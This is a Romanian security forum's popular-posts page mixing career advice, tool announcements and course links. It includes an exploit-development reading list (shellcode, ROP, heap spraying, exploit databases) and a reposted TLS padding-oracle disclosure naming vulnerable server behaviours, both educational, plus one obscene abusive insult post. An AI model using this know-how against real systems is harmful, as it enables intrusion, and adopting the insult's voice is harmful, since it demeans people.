Jump to content

Leaderboard


Popular Content

Showing content with the highest reputation since 02/20/19 in all areas

  1. 7 points
    Tot ce tine de web este relativ nou, considerand modul in care opereaza facultatile pentru a adauga noi cursuri. Ca un domeniu sa fie considerat pentru a fi adaugat intr-o facultate, trebuie sa demonstreze ca este foarte cautat, pentru a se asigura ca locurile vor fi ocupate si ca include alte subcategorii care-ti vor permite sa te specializezi. Iar apoi, trebuie sa bata celelalte domenii, pentru ca nu poti introduce intr-o facultate toate domeniile posibile in IT, ca sunt prea multe. Cu alte cuvinte, daca o facultate ar pune mai presus design-ul, fata de programatori, de exemplu, ar avea de pierdut, pentru ca exista mai multe persoane dornice sa devina programatori. Momentan asta este sexy cand te referi la IT. Lumea pur si simplu a auzit mai mult termenul de programator, orice ar insemna asta pentru ei, decat termenul UI/web designer. Pentru ei conteaza sa scoata persoane care vor fi in stare sa rezolve problemele cele mai comune, ca sa se poata angaja rapid. Nu conteaza cat valoreaza cunostintele lor, nu conteaza ca scot "ingineri" pe banda rulanta, de fapt asta este ideal pentru o societate, pentru ca e mai valoros cineva care se poate angaja pe pozitiile de jos decat sa stea degeaba. Pentru o facultate conteaza cifrele; numarul de aplicanti, numarul de persoane admise si numarul de absolventi. Nu se gadeste nimeni la tine individual si la ce atrageri ai tu in domeniul IT, nici n-ar avea cum sa faca asta si sa aibe si numere mari de aplicanti si absolventi. Ei incearca sa-ti predea bazele din cat mai multe subdomenii, astfel incat sa-ti dai seama singur ce-ti place si cu ce vei continua. Ce vreau sa spun e ca daca vrei sa te specializezi pe ceva atat de specific precum UI/UX design, trebuie sa o faci pe propriile puteri, pentru ca la final, orice facultate ai absolvi, tot inginer va scrie pe diploma. In concluzie, as dori sa subliniez faptul ca facultatea este irelevanta atunci cand vrei sa te specializezi pe UI/UX design. Diploma iti poate oferi un boost la angajare, dar mai mult de atat, nu ai ce face cu ea. E doar o chitanta cu un design ciudat care atesta faptul ca ai fost in stare sa retii pe de rost ce ti-a fost predat, cu alte cuvinte, ca esti apt de a fi un subordonat bun. A nu se intelege gresit, nu te sfatuiesc sa nu faci facultatea, ci doar incerc sa te fac sa intelegi ca tu vei depune acelasi efort sa devii UI/UX designer indiferent de facultatea pe care o faci.
  2. 6 points
    Am facut un mic update la MultiEncoder.com (fostul Krypton). Interfata e schimbata si a fost rescris cu Vue in loc de jQuery. Ar trebui sa performeze mai bine la string-uri mari. Codul sursa se poate gasi pe GitHub, aici. https://multiencoder.com/#rst+powa Anuntati-ma daca gasiti bug-uri sau sugestii.
  3. 5 points
    Din cand in cand mai codez cate ceva care cred ca merita prezentat. Cum tot talentul meu de marketing se rezuma la postatul aici pe forum, am sa fac la fel si de data asta, ca poate mai castig cativa utilizatori. Pe scurt, am creat o extensie de browser care introduce date fake in formulare si face toata testarea mai comoda. Practic se foloseste de libraria asta, dar stie si alte trucuri. Mai multe chiar. Daca e cineva interesat de asa ceva si vrea sa o incerce, o poate gasi aici: Link pentru Chrome Link pentru Firefox
  4. 5 points
    L-am pus aici ca in bookmarks nu prea le gasesc. Sursa: http://www.pentest.guru/index.php/2016/01/28/best-books-tutorials-and-courses-to-learn-about-exploit-development/ The best resources for learning exploit development Exploit development is considered to be the climax in the learning path of an ethical hacker or security professional. It is strongly advisable to have mastered the basics before delving into this topic. Exploit development is hard and it’s not something you learn at school or university (usually), not something any of your geek friends will talk about all day long. Only those who are brave to study hard can achieve the joy of controlling the EIP, popping a shell and taking control of a machine while the oblivious user yells at Microsoft for the nth crash of his beloved program. What are the prerequisites for learning about exploit development? Well, if you want to comprehend and hopefully start developing your own exploits you should have at least a basic knowledge of x86/64 bit system architecture (Windows, Linux or Mac according to your target), low level programming, possibly assembly, C/C++ or Python is fine as well for many tasks, then you should have in mind how the computer memory works (RAM), the concept of stack, heap, CPU registers, the most common operations, system calls, segmentation fault, buffer overflow, race condition and so on. You also should be familiar with disassemblers and a background in reverse engineering or malware analysis may be useful before starting to develop your own exploits. Let’s see some resources that can help you to be prepared before attempting the big jump onto the high level world of exploit development, the Olympus of the Godly Hackers. x86/64 bit system architecture: Introductory Intel x86: Architecture, Assembly, Applications, & Alliteration Introductory Intel x86-64: Architecture, Assembly, Applications, & Alliteration Intermediate Intel x86: Architecture, Assembly, Applications, & Alliteration Assembly language: http://www.drpaulcarter.com/pcasm/ Assembly Language Step-by-Step: Programming with Linux The Art of Assembly Language Windows Assembly Language Megaprimer Assembly Language Megaprimer for Linux C/C++: C Programming Absolute Beginner’s Guide The C Programming Language Introduction to Computer Science CS50x Programming: Principles and Practice Using C++ C++ Primer Accelerated C++: Practical Programming by Example Python: Python has a wonderful official documentation, apart from that you can use the following books/courses: Learn Python the hard way How to think like a computer scientist Learning Python Introduction to computer science and programming using Python MITx 6.00.1x When you feel comfortable with the prerequisites, then you can start learning exploit developmentfollowing these great resources! I compiled a list of books, tutorials, courses, tools and vulnerable applications that you can use for your study. BOOKS Hacking – The art of exploitation A bug Hunter’s Diary: A Guided Tour Through the Wilds of Software Security The Shellcoder’s Handbook: Discovering and Exploiting Security Holes Sockets, shellcode, Porting, and coding: reverse engineering Exploits and Tool coding for security professionals Writing Security tools and Exploits Buffer overflow attacks: Detect, exploit, Prevent Metasploit toolkit for Penetration Testing, exploit Development, and vulnerability research TUTORIALS Corelan.be https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/ https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/ https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/ https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/ https://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/ https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/ https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/ https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/ https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/ https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/ https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/ https://www.corelan.be/index.php/2010/01/26/starting-to-write-immunity-debugger-pycommands-my-cheatsheet/ https://www.corelan.be/index.php/2010/03/22/ken-ward-zipper-exploit-write-up-on-abysssec-com/ https://www.corelan.be/index.php/2010/03/27/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion/ https://www.corelan.be/index.php/2011/01/30/hack-notes-rop-retnoffset-and-impact-on-stack-setup/ https://www.corelan.be/index.php/2011/05/12/hack-notes-ropping-eggs-for-breakfast/ https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/ https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/ https://www.corelan.be/index.php/2012/02/29/debugging-fun-putting-a-process-to-sleep/ https://www.corelan.be/index.php/2012/12/31/jingle-bofs-jingle-rops-sploiting-all-the-things-with-mona-v2/ https://www.corelan.be/index.php/2013/02/26/root-cause-analysis-memory-corruption-vulnerabilities/ https://www.corelan.be/index.php/2013/01/18/heap-layout-visualization-with-mona-py-and-windbg/ https://www.corelan.be/index.php/2013/02/19/deps-precise-heap-spray-on-firefox-and-ie10/ https://www.corelan.be/index.php/2013/07/02/root-cause-analysis-integer-overflows/ Opensecuritytraining.info http://opensecuritytraining.info/Exploits1.html http://opensecuritytraining.info/Exploits2.html Securitytube.net http://www.securitytube.net/groups?operation=view&groupId=7 exploit research megaprimer http://www.securitytube.net/groups?operation=view&groupId=4 buffer overflow exploitation for linux megaprimer http://www.securitytube.net/groups?operation=view&groupId=3 Format string vulnerabilities megaprimer Massimiliano Tomassoli’s blog http://expdev-kiuhnm.rhcloud.com/2015/05/11/contents/ Samsclass.info https://samsclass.info/127/127_F15.shtml Securitysift.com http://www.securitysift.com/windows-exploit-development-part-1-basics/ http://www.securitysift.com/windows-exploit-development-part-2-intro-stack-overflow/ http://www.securitysift.com/windows-exploit-development-part-3-changing-offsets-and-rebased-modules/ http://www.securitysift.com/windows-exploit-development-part-4-locating-shellcode-jumps/ http://www.securitysift.com/windows-exploit-development-part-5-locating-shellcode-egghunting http://www.securitysift.com/windows-exploit-development-part-6-seh-exploits http://www.securitysift.com/windows-exploit-development-part-7-unicode-buffer-overflows Justbeck.com http://www.justbeck.com/getting-started-in-exploit-development/ 0xdabbad00.com http://0xdabbad00.com/2012/12/09/hurdles-for-a-beginner-to-exploit-a-simple-vulnerability-on-modern-windows/ fuzzysecurity.com Part 1: Introduction to Exploit Development Part 2: Saved Return Pointer Overflows Part 3: Structured Exception Handler (SEH) Part 4: Egg Hunters Part 5: Unicode 0x00410041 Part 6: Writing W32 shellcode Part 7: Return Oriented Programming Part 8: Spraying the Heap [Chapter 1: Vanilla EIP] Part 9: Spraying the Heap [Chapter 2: Use-After-Free] sploitfun.wordpress.com https://sploitfun.wordpress.com/2015/06/26/linux-x86-exploit-development-tutorial-series/ sneakerhax.com http://sneakerhax.com/jumping-into-exploit-development/ community.rapid7.com https://community.rapid7.com/community/metasploit/blog/2012/07/05/part-1-metasploit-module-development–the-series resources.infosecinstitute.com http://resources.infosecinstitute.com/debugging-fundamentals-for-exploit-development/ rafayhackingarticles.net http://www.rafayhackingarticles.net/2011/07/from-minor-bug-to-zero-day-exploit.html Smashing the stack for fun and for profit: revived Automating format string exploits IT-Sec catalog 2.0 (Exploit development) by Arthur Gerkis NCCGroup.trust https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/writing-exploits-for-win32-systems-from-scratch/ Desc0n0cid0.blogspot.it https://desc0n0cid0.blogspot.it/2016/09/stack-based-buffer-overflow.html https://desc0n0cid0.blogspot.it/2016/09/stack-based-buffer-overflow_28.html https://desc0n0cid0.blogspot.it/2016/09/stack-based-buffer-overflow_29.html https://desc0n0cid0.blogspot.it/2016/10/part-4-stack-based-buffer-overflow.html Stack Based Overflow Articles. Win32 Buffer Overflows (Location, Exploitation and Prevention) – by Dark spyrit [1999] Writing Stack Based Overflows on Windows – by Nish Bhalla’s [2005] Heap Based Overflow Articles. Third Generation Exploitation smashing heap on 2k – by Halvar Flake [2002] Exploiting the MSRPC Heap Overflow Part 1 – by Dave Aitel (MS03-026) [September 2003] Exploiting the MSRPC Heap Overflow Part 2 – by Dave Aitel (MS03-026) [September 2003] Windows heap overflow penetration in black hat – by David Litchfield [2004] Kernel Based Exploit Development Articles. How to attack kernel based vulns on windows was done – by a Polish group called “sec-labs” [2003] Sec-lab old whitepaper Sec-lab old exploit Windows Local Kernel Exploitation (based on sec-lab research) – by S.K Chong [2004] How to exploit Windows kernel memory pool – by SoBeIt [2005] Exploiting remote kernel overflows in windows – by Eeye Security Kernel-mode Payloads on Windows in uninformed – by Matt Miller Exploiting 802.11 Wireless Driver Vulnerabilities on Windows BH US 2007 Attacking the Windows Kernel Remote and Local Exploitation of Network Drivers Exploiting Comon Flaws In Drivers I2OMGMT Driver Impersonation Attack Real World Kernel Pool Exploitation Exploit for windows 2k3 and 2k8 Alyzing local privilege escalations in win32k Intro to Windows Kernel Security Development There’s a party at ring0 and you’re invited Windows kernel vulnerability exploitation Windows memory protections Introduction Articles. Data Execution Prevention /GS (Buffer Security Check) /SAFESEH ASLR SEHOP Windows memory protections Bypass Methods Articles. Third Generation Exploitation smashing heap on 2k – by Halvar Flake [2002] Creating Arbitrary Shellcode In Unicode Expanded Strings – by Chris Anley Advanced windows exploitation – by Dave Aitel [2003] Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server – by David Litchfield Reliable heap exploits and after that Windows Heap Exploitation (Win2KSP0 through WinXPSP2) – by Matt Conover in cansecwest 2004 Safely Searching Process Virtual Address Space – by Matt Miller [2004] IE exploit and used a technology called Heap Spray Bypassing hardware-enforced DEP – by Skape (Matt Miller) and Skywing (Ken Johnson) [October 2005] Exploiting Freelist[0] On XP Service Pack 2 – by Brett Moore [2005] Kernel-mode Payloads on Windows in uninformed Exploiting 802.11 Wireless Driver Vulnerabilities on Windows Exploiting Comon Flaws In Drivers Heap Feng Shui in JavaScript by Alexander sotirov [2007] Understanding and bypassing Windows Heap Protection – by Nicolas Waisman [2007] Heaps About Heaps – by Brett moore [2008] Bypassing browser memory protections in Windows Vista – by Mark Dowd and Alex Sotirov [2008] Attacking the Vista Heap – by ben hawkes [2008] Return oriented programming Exploitation without Code Injection – by Hovav Shacham (and others ) [2008] Token Kidnapping and a super reliable exploit for windows 2k3 and 2k8 – by Cesar Cerrudo [2008] Defeating DEP Immunity Way – by Pablo Sole [2008] Practical Windows XP2003 Heap Exploitation – by John McDonald and Chris Valasek [2009] Bypassing SEHOP – by Stefan Le Berre Damien Cauquil [2009] Interpreter Exploitation : Pointer Inference and JIT Spraying – by Dionysus Blazakis[2010] Write-up of Pwn2Own 2010 – by Peter Vreugdenhil All in one 0day presented in rootedCON – by Ruben Santamarta [2010] DEP/ASLR bypass using 3rd party – by Shahin Ramezany [2013] Typical windows exploits Real-world HW-DEP bypass Exploit – by Devcode Bypassing DEP by returning into HeapCreate – by Toto First public ASLR bypass exploit by using partial overwrite – by Skape Heap spray and bypassing DEP – by Skylined First public exploit that used ROP for bypassing DEP in adobe lib TIFF vulnerability Exploit codes of bypassing browsers memory protections PoC’s on Tokken TokenKidnapping . PoC for 2k3 -part 1 – by Cesar Cerrudo PoC’s on Tokken TokenKidnapping . PoC for 2k8 -part 2 – by Cesar Cerrudo An exploit works from win 3.1 to win 7 – by Tavis Ormandy KiTra0d Old ms08-067 metasploit module multi-target and DEP bypass PHP 6.0 Dev str_transliterate() Buffer overflow – NX + ASLR Bypass SMBv2 Exploit – by Stephen Fewer TRAININGS Opensecuritytraining.info http://opensecuritytraining.info/Exploits1.html http://opensecuritytraining.info/Exploits2.html Module 12 of Advanced penetration testing cource on Cybrary.it https://www.cybrary.it/course/advanced-penetration-testing/ Securitytube.net http://www.securitytube.net/groups?operation=view&groupId=7 research megaprimer http://www.securitytube.net/groups?operation=view&groupId=4 exploitation for linux megaprimer http://www.securitytube.net/groups?operation=view&groupId=3 Format string vulnerabilities megaprimer infiniteskills.com http://www.infiniteskills.com/training/reverse-engineering-and-exploit-development.html COURSES Corelan https://www.corelan-training.com Offensive Security https://www.offensive-security.com/information-security-training/advanced-windows-exploitation/ AWE (Advanced Windows Exploitation) SANS https://www.sans.org/course/advance-exploit-development-pentetration-testers SANS SEC760: Advanced Exploit Development for Penetration Testers Ptrace Security http://www.ptrace-security.com/training/courses/advanced-software-exploitation/ Advanced Software Exploitation Udemy https://www.udemy.com/windows-exploit-development-megaprimer/learn/#/Windows exploit Development Megaprimer by Ajin Abraham VIDEOS LiveOverflow Youtube channel TOOLS IDA Pro – Windows disassembler and debugger, with a free evaluation version. OllyDbg – An assembly-level debugger for Windows executables. WinDbg – Windows debugger Mona.py – Immunity debugger helper angr – Platform-agnostic binary analysis framework developed at UCSB’s Seclab. BARF – Multiplatform, open source Binary Analysis and Reverse engineering Framework. binnavi – Binary analysis IDE for reverse engineering based on graph visualization. Bokken – GUI for Pyew and Radare. Capstone – Disassembly framework for binary analysis and reversing, with support for many architectures and bindings in several languages. codebro – Web based code browser using clang to provide basic code analysis. dnSpy – .NET assembly editor, decompiler and debugger. Evan’s Debugger (EDB) – A modular debugger with a Qt GUI. GDB – The GNU debugger. GEF – GDB Enhanced Features, for exploiters and reverse engineers. hackers-grep – A utility to search for strings in PE executables including imports, exports, and debug symbols. Immunity Debugger – Debugger for malware analysis and more, with a Python API. ltrace – Dynamic analysis for Linux executables. objdump – Part of GNU binutils, for static analysis of Linux binaries. PANDA – Platform for Architecture-Neutral Dynamic Analysis PEDA – Python Exploit Development Assistance for GDB, an enhanced display with added commands. pestudio – Perform static analysis of Windows executables. Process Monitor – Advanced monitoring tool for Windows programs. Pyew – Python tool for malware analysis. Radare2 – Reverse engineering framework, with debugger support. SMRT – Sublime Malware Research Tool, a plugin for Sublime 3 to aid with malware analyis. strace – Dynamic analysis for Linux executables. Udis86 – Disassembler library and tool for x86 and x86_64. Vivisect – Python tool for malware analysis. X64dbg – An open-source x64/x32 debugger for windows. afl – American Fuzzy Lop fuzzer gef – enhanced gdb debugger honggfuzz – general purpose fuzzer libheap – python gdb library for examining glibc heap (ptmalloc) pwndbg – enhanced gdb framework for exploit development pwntools – exploit development and CTF toolkit qira – parallel, timeless debugger ropper – rop gadget finder rp++ – rop gadget finder xrop – rop gadget finder shellnoob – shellcode writing helper shellsploit – exploit development toolkitSploitKit – a suite of cli tools to automate the tedious parts of exploit development ROP Injector – rop injector HEAP EXPLOITATION TECHNIQUES https://github.com/shellphish/how2heap VULNERABLE APPLICATIONS Exploit-exercises.com https://exploit-exercises.com/protostar/ Protostar https://exploit-exercises.com/fusion/ Fusion StackSmash – A collection of toy programs for teaching buffer overflow vulnerabilities CTF-Workshop – challenges for binary exploitation workshop28 hacking sites to practise your skills in a legal wayhttps://www.peerlyst.com/blog-post/practise-your-infosec-skill-on-these-legal-28-hacking-sites EXPLOITS DATABASE https://www.exploit-db.com https://www.milw00rm.com http://0day.today https://packetstormsecurity.com http://www.securityfocus.com http://www.windowsexploits.com http://iedb.ir http://www.macexploit.com COLLABORATE! Do you have other fantastic resources to share that could be part of this list? Then check out my projecton Github and send me a pull request!
  5. 5 points
    Programarea retelelor de calculatoare. Materie facuta in 2 ani diferiti, part1 = primul an, part2 = al doilea an. In mare parte, cam ce e in part2, e si in partea 1. https://drive.google.com/open?id=1tEbiZT6rYXgWgqFEydH3yPsEgOT-SzH9
  6. 4 points
  7. 4 points
    Pentru cei care va plictisiti si taiati frunze la caini: 1. Cu multumiri lui @jreister pentru pont, https://azure.microsoft.com/en-us/free/ pentru free credit 2. Tutoriale pdf pas cu pas - Build a Bot, Custom vision lab, Machine Learning Studio 3. Hands-on learning si alte materiale aditionale: 4. Materiale pentru Microsoft AI 5. Cursuri referitoare la cele de mai sus, structurate cum trebuie. Include si cybersecurity 6. AI Labs cu diferite experimente. Recomand de vazut cel cu JFK (utilizand Microsoft AI): Spor la treaba!
  8. 4 points
    carderi nu zic ca nu sunt, dar faza cu asasinii...v-a intrat un mit in cap, ca pe tor sunt asasini, satanisti, taxiuri negre, cica si Dan Spataru intra live cu Dolanescu din cand in cand. Realitatea e ca se invart doar copii curiosi si tepari p-acolo. Cate un dealer mai rasare si dispare, hitmeni d-astia care dau refresh la pagina din minut in minut sa vada daca le-au intrat mesaje de la clienti...🐼
  9. 4 points
    Daca tot suntem la capitolul networking, am si eu ceva. Poza1 Poza2 Tot ce este aici este in format video, in mare parte Cisco (CCNA, CCNP, CCIE) dar si ceva de Juniper si Security. Academia este in numele folder-ului. Va pot face rost de orice curs doriti voi(daca-l gasesc de unde le iau eu), fie ca este R&S, Voice, DC si asa mai departe, de la orice academie, de preferat Cisco. Este stocat in DigiStorage-ul meu, deci va pot oferi acces. De asemenea, va pot oferi ORICE carte de networking. Am aproximativ 10.000 de carti de IT(nu ma intrebati de ce am atatea), incepand cu 1995, cereti-mi si daca am, va ofer. Ofer acces doar cui consider eu ca merita. Daca aveti cont de o luna sau aveti numai posturi de troll, nici macar nu va mai obositi.
  10. 4 points
    Cel mai simplu: 1. Daca rulezi windows, il umplii pana la refuz cu porno si apoi il formatezi (sa aibe oamenii ce recupera de pe el) 2. Daca rulezi linux, scrii informatii pe el (fill up) cu dd + urandom si apoi il formatezi. Sunt singurele metode 100% sigure. Format simplu e ca si cum ai avea picior de lemn si i-ai face masaj pentru reumatism.
  11. 3 points
    Vezi pe https://gloryholefoundation.com/subiectebac2019
  12. 3 points
    Du-te ba in mortii ma-tii de obosit cu anonimosu pizdii, futu-te-n gaoaza sa te fut de parlit ce esti tu.
  13. 3 points
    "Salut ! Sunt student la informatică , iar în ultimele 4 luni am descoperit pentesting-ul." Nu iti cunosc experienta....dar am impresia ca te-ai grabit putin . Foloseste-te de search bar-ul din site, vei gasi mai multe topicuri legate de OSCP. Decat sa te umple cineva cu documentatii mai bine cauta, citeste si completeaza ce nu stii din acel topic .
  14. 3 points
    nuti trebe ba atata skoala.ce sa faci cu ia? iote, a avut 2, 3 si 3 an simulari la bak, si acum o duc foarte bine. e usoara veataza, anvetzi "donne moi de l'argent" si vei avea un venit peste salariul mediu din RO Btw, daca este acea simulare care se da in toata romania, da, este facute de minister, daca nu, e o laba facuta de profesrii liceului. Cat de folositoare e? E folositoare sa arate tuturor cat sunt de prosti. Nu, niciodata subiectul de la simulare nu va fi ca cel de la bac, DAR structura este identica.
  15. 3 points
    Salut, Am vazut ca sunt printre noi multi care investesc sau tin crypto monede. Eu recent am inceput sa lucrez la un cold wallet mazat pe arduino zero. Costul prototipului e undeva la 90 lei. Daca ar fi produs in masa costul ar fi undeva la 50. (comparativ cu un trezor sau ledger care sunt +400 lei ) V-ati increde sa construiti sau sa utilizati un asemenea device, daca proiectul ar fi matur? (codul si instructiunile vor fi facute open source) Ce vulnerabilitati sau probleme in securitate si functionalitate vedeti? Ce ati adauga pt a imbunatati produsul? Daca nu unde va tineti monedele?
  16. 3 points
    E site Moodle (moodle.org), open source. Tot codul este disponibil: https://github.com/moodle/moodle deci poti cauta vulnerabilitati cat si cum ai chef. Daca ar exista o vulnerabilitate de genul ai putea sa o vinzi pe bani buni. Lasa laba si pune mana pe invatat.
  17. 3 points
    TLS Padding Oracles The TLS protocol provides encryption, data integrity, and authentication on the modern Internet. Despite the protocol’s importance, currently-deployed TLS versions use obsolete cryptographic algorithms which have been broken using various attacks. One prominent class of such attacks is CBC padding oracle attacks. These attacks allow an adversary to decrypt TLS traffic by observing different server behaviors which depend on the validity of CBC padding. We evaluated the Alexa Top Million Websites for CBC padding oracle vulnerabilities in TLS implementations and revealed vulnerabilities in 1.83% of them, detecting nearly 100 different vulnerabilities. These padding oracles stem from subtle differences in server behavior, such as responding with different TLS alerts, or with different TCP header flags. We suspect the subtlety of different server responses is the reason these padding oracles were not detected previously. Full Technical Paper Robert Merget, Juraj Somorovsky, Nimrod Aviram, Craig Young, Janis Fliegenschmidt, Jörg Schwenk, Yuval Shavitt: Scalable Scanning and Automatic Classification of TLS Padding Oracle Vulnerabilities. USENIX Security 2019 The full paper will be presented at USENIX Security in August 2019. Who Is Affected? Since the identification of different vendors is fairly difficult and requires the cooperation of the scanned websites, a lot of our vulnerabilities are not attributed yet. On this Github page, we collect the current status of the responsible disclosure process and give an overview of the revealed vulnerabilities. The currently identified and fixed vulnerabilities are: OpenSSL. CVE-2019-1559. OpenSSL Security Advisory: 0-byte record padding oracle Citrix. CVE-2019-6485. TLS Padding Oracle Vulnerability in Citrix Application Delivery Controller (ADC) and NetScaler Gateway. F5. CVE-2019-6593. TMM TLS virtual server vulnerability CVE-2019-6593. The disclosure process is still running with a handful of vendors. Some of them consider to disable or even completely remove CBC cipher suites from their products. Recommendations for TLS Implementations Developers If you are developing a TLS implementation, this is obviously a good reminder to review your CBC code and make sure it does not expose a padding oracle; obviously, this is easier said than done. We therefore invite developers of TLS implementations to contact us in this matter. We will evaluate your implementation and if you are vulnerable, work with you to understand the nature of the vulnerability. (To be clear, we will do this free of charge). We will link the final version of our scanning tool detecting these vulnerabilities in the next days. Background Cipher Block Chaining (CBC) mode of operation The CBC mode of operation allows one to encrypt plaintexts of arbitrary length with block ciphers like AES or 3DES. In CBC mode, each plaintext block is XOR’ed to the previous ciphertext block before being encrypted by the block cipher. We simply refer to Wikipedia for more information. Padding oracle attacks exploit the CBC malleability. The problem of CBC is that it allows an attacker to perform meaningful plaintext modifications without knowing the symmetric key. More concretely, it allows an attacker to flip a specific plaintext bit by flipping a bit in the previous ciphtertext block. This CBC property has already been exploited in many attacks, for example, most recently in the Efail attack. CBC and its usage in the TLS record layer In order to protect messages (records) exchanged between TLS peers, it is possible to use different cryptographic primitives. One of them is a MAC combined with AES in CBC mode of operation. Unfortunately, TLS decided to use the MAC-then-PAD-then-Encrypt mechanism, which means that the encryptor first computes a MAC over the plaintext, then pads the message to achieve a multiple of block length, and finally uses AES-CBC to encrypt the ciphertext. For example, if we want to encrypt five bytes of data and use HMAC-SHA (with 20 bytes long output), we end up with two blocks. The second block needs to be padded with 7 bytes 0x06. Padding oracle attacks In 2002, Vaudenay showed that revealing padding failures after message decryption could have severe consequences for the security of the application. Since the CBC malleability allows an attacker to flip arbitrary message bytes, the attacker is also able to modify specific padding bytes. If the application decrypts the modified message and reports problems related to padding validity, the attacker is able to learn the underlying plaintext. We refer to this explanation by Erlend Oftedal for more details. In TLS, the attack is a bit more complex because the targeted TLS connection is always closed once invalid padding is triggered. Nevertheless, the vulnerability is practically exploitable in BEAST scenarios and allows the attacker to decrypt repeated secrets like session cookies. Therefore, it is very important that the TLS implementations do not reveal any information about padding validity. This includes different TLS alerts, connection states, or even timing behavior. Vulnerability Details OpenSSL (CVE-2019-1559) With the help of the Amazon security team, we identified a vulnerability which was mostly found on Amazon servers and Amazon Web Services (AWS). Hosts affected by this vulnerability immediately respond to most records with BAD_RECORD_MAC and CLOSE_NOTIFY alerts, and then close the connection. However, if the hosts encounter a zero-length record with valid padding and a MAC present, they do not immediately close the TCP connection, regardless of the validity of the MAC. Instead, they keep the connection alive for more than 4 seconds after sending the CLOSE_NOTIFY alert. This difference in behavior is easily observable over the network. Note that the MAC value does not need to be correct for triggering this timeout, it is sufficient to create valid padding which causes the decrypted data to be of zero length. Further investigations revealed that the Amazon servers were running an implementation which uses the OpenSSL 1.0.2 API. In some cases, the function calls to the API return different error codes depending on whether a MAC or padding error occurred. The Amazon application then takes different code paths based on these error codes, and the different paths result in an observable difference in the TCP layer. The vulnerable behavior only occurs when AES-NI is not used. Citrix (CVE-2019-6485) The vulnerable Citrix implementations first check the last padding byte and then verify the MAC. If the MAC is invalid, the server closes the connection. This is done with either a connection timeout or an RST, depending on the validity of the remaining padding bytes. However, if the MAC is valid, the server checks whether all other remaining padding bytes are correct. If they are not, the server responds with a BAD_RECORD_MAC and an RST (if they are valid, the record is well-formed and is accepted). This behavior can be exploited with an attack similar to POODLE. FAQ Can these vulnerabilities be exploited? Yes, but exploitation is fairly difficult. If you use one of the above implementations, you should still make sure you have patched. To be more specific, the attack can be exploited in BEAST scenarios. There are two prerequisites for the attack. First, the attacker must be able to run a script in the victim's browser which sends requests to a vulnerable website. This can be achieved tempting the victim to visit a malicious website. Second, the attacker must be able to modify requests sent by the browser and observe the server behavior. The second prerequisite is much harder to achieve, because the attacker must be an active Man-in-the-Middle. Have these vulnerabilities actually been exploited? We have no reason to believe these vulnerabilities have been exploited in the wild so far. I used a vulnerable implementation. Do I need to revoke my certificate? No, this attack does not recover the server's private key. Do I need to update my browser? No. These are server-side vulnerabilities, and can only be fixed by deploying a fix on the server. How many implementations are vulnerable? Our Alexa scans identified more than 90 different server behaviors triggered in our padding oracle scans. Some of them will probably be caused by outdated servers. However, we assume many of the newest servers will need fixes. How is this related to previous research? In 2002, Vaudenay presented an attack which targets messages encrypted with the CBC mode of operation. The attack exploits the malleability of the CBC mode, which allows altering the ciphertext such that specific cleartext bits are flipped, without knowledge of the encryption key. The attack requires a server that decrypts a message and responds with 1 or 0 based on the message validity. This behavior essentially provides the attacker with a cryptographic oracle which can be used to mount an adaptive chosen-ciphertext attack. The attacker exploits this behavior to decrypt messages by executing adaptive queries. Vaudenay exploited a specific form of vulnerable behavior, where implementations validate the CBC padding structure and respond with 1 or 0 accordingly. This class of attacks has been termed padding oracle attacks. Different types of CBC padding oracles have been used to break the confidentiality of TLS connections. These include Lucky Thirteen, Lucky Microseconds, Lucky 13 Strikes Back, and Ronen et al. Another important attack is POODLE (Padding Oracle On Downgraded Legacy Encryption) which targets SSLv3 and its specific padding scheme. In SSLv3 only the last padding byte is checked. Möller, Duong and Kotowicz exploited this behavior and showed that for implementation it is necessary to correctly verify all padding bytes. Similar behaviors were found in several TLS implementations. How is it possible that such an old vulnerability is still present in 2019? Writing this code correctly is very hard, even for experts. For example, in one instance experts have introduced a severe form of this vulnerability while attempting to patch the code to eliminate it. Identifying these vulnerabilities is also hard since some of them only manifest under a combination of specific conditions. For example, the OpenSSL vulnerability only manifests in OpenSSL version 1.0.2, only for non-stitched [1] cipher suites, when AES-NI is not used. It also requires subtle interactions between external code that calls the OpenSSL API, and the OpenSSL code itself. We take this opportunity to suggest deprecating CBC cipher suites in TLS altogether. [1]: Stitched ciphersuites is an OpenSSL term for optimised implementations of certain commonly used ciphersuites. See here for more details. Why are you not submitting your findings via BugBounty websites? We tried to get in contact with security teams via common BugBounty sites but had very bad experiences. Man-in-the-Middle attacks are usually out of scope for most website owners, and security teams did not know how to deal with this kind of issue. We lost a lot of "Points" on Hackerone and BugCrowd for reporting such issues (with the intention to learn the vendor) and learned absolutely nothing by doing this. All in all a very frustrating experience. We hope that our new approach of disclosure is more useful to get in contact with developers and vendors. Can this attack be used against Bitcoin? No. This attack is based on the vulnerability present in the Cipher Block Chaining (CBC) mode of operation. Bitcoin does not use CBC. However, if you are a blockchain designer, we strongly recommend you to evaluate the security of your block chaining technology and, especially, its padding scheme. Do you have a name or a logo for this vulnerability? No. Sorry, not this time. Sursa: https://github.com/RUB-NDS/TLS-Padding-Oracles
  18. 3 points
